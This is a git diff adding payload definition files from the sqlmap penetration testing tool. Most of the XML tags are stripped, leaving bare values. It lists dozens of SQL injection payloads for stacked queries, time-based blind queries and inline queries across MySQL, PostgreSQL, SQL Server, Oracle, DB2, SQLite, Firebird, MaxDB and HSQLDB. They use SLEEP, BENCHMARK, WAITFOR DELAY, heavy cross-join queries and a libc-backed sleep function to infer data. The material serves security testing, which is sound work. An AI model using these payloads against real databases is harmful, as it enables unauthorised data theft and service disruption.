+ + + Firebird inline queries + 3 + 3 + 1 + 1,2,3,8 + 3 + SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE + + SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + ClickHouse inline queries + 3 + 3 + 1 + 1,2,3,8 + 3 + ('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + ('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + +
diff --git a/src/sqlmap-master/data/xml/payloads/stacked_queries.xml b/src/sqlmap-master/data/xml/payloads/stacked_queries.xml new file mode 100644 index 0000000..b431bb7 --- /dev/null +++ b/src/sqlmap-master/data/xml/payloads/stacked_queries.xml @@ -0,0 +1,730 @@ + + + + + + MySQL >= 5.0.12 stacked queries (comment) + 4 + 2 + 1 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + ;SELECT SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 stacked queries + 4 + 3 + 1 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + ;SELECT SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 stacked queries (query SLEEP - comment) + 4 + 3 + 1 + 1-8 + 1 + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 stacked queries (query SLEEP) + 4 + 4 + 1 + 1-8 + 1 + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 stacked queries (BENCHMARK - comment) + 4 + 3 + 2 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL +
+
+ + + MySQL < 5.0.12 stacked queries (BENCHMARK) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL +
+
+ + + PostgreSQL > 8.1 stacked queries (comment) + 4 + 1 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;SELECT PG_SLEEP([SLEEPTIME]) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 stacked queries + 4 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;SELECT PG_SLEEP([SLEEPTIME]) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL stacked queries (heavy query - comment) + 4 + 2 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) + -- + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL < 8.2 stacked queries (Glibc - comment) + 4 + 3 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) + -- + + + + +
+ PostgreSQL + < 8.2 + Linux +
+
+ + + PostgreSQL < 8.2 stacked queries (Glibc) + 4 + 5 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) + + + + +
+ PostgreSQL + < 8.2 + Linux +
+
+ + + Microsoft SQL Server/Sybase stacked queries (comment) + 4 + 1 + 1 + 1-8 + 1 + ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + ;WAITFOR DELAY '0:0:[SLEEPTIME]' + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase stacked queries (DECLARE - comment) + 4 + 2 + 1 + 1-8 + 1 + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x + + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase stacked queries + 4 + 4 + 1 + 1-8 + 1 + ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + ;WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase stacked queries (DECLARE) + 4 + 5 + 1 + 1-8 + 1 + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x + + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment) + 4 + 1 + 1 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL + + ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) + 4 + 4 + 1 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL + + ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (heavy query - comment) + 4 + 2 + 2 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL + + ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL + + ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_LOCK.SLEEP - comment) + 4 + 4 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END + + ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_LOCK.SLEEP) + 4 + 5 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END + + ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (USER_LOCK.SLEEP - comment) + 4 + 5 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END + + ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (USER_LOCK.SLEEP) + 4 + 5 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END + + ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END + + + + +
+ Oracle +
+
+ + + IBM DB2 stacked queries (heavy query - comment) + 4 + 3 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + -- + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + + + + +
+ IBM DB2 +
+
+ + + SQLite > 2.0 stacked queries (heavy query - comment) + 4 + 3 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE + + ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 + -- + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE + + ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 + + + + +
+ Firebird + >= 2.0 +
+
+ + + SAP MaxDB stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + -- + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + + + + +
+ SAP MaxDB +
+
+ + + HSQLDB >= 1.7.2 stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 2.0 stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + >= 2.0 +
+
+ + + HSQLDB >= 2.0 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 2.0 +
+
+ + +
diff --git a/src/sqlmap-master/data/xml/payloads/time_blind.xml b/src/sqlmap-master/data/xml/payloads/time_blind.xml new file mode 100644 index 0000000..21a50ce --- /dev/null +++ b/src/sqlmap-master/data/xml/payloads/time_blind.xml @@ -0,0 +1,2174 @@ + + + + + + + + MySQL >= 5.0.12 AND time-based blind (query SLEEP) + 5 + 1 + 1 + 1,2,3,8,9 + 1 + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (query SLEEP) + 5 + 1 + 3 + 1,2,3,9 + 1 + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (SLEEP) + 5 + 2 + 1 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (SLEEP) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (SLEEP - comment) + 5 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (SLEEP - comment) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment) + 5 + 3 + 1 + 1,2,3,9 + 1 + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 AND time-based blind (BENCHMARK) + 5 + 2 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 OR time-based blind (BENCHMARK) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind + 5 + 2 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP) + 5 + 3 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL AND time-based blind (ELT) + 5 + 3 + 1 + 1,2,3,8,9 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL OR time-based blind (ELT) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL AND time-based blind (ELT - comment) + 5 + 5 + 1 + 1,2,3,9 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + + +
+ MySQL +
+
+ + + MySQL OR time-based blind (ELT - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + + +
+ MySQL +
+
+ + + PostgreSQL > 8.1 AND time-based blind + 5 + 1 + 1 + 1,2,3,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 OR time-based blind + 5 + 1 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 AND time-based blind (comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase time-based blind (IF) + 5 + 1 + 1 + 0 + 1 + IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
+ Microsoft SQL Server + Sybase +
+
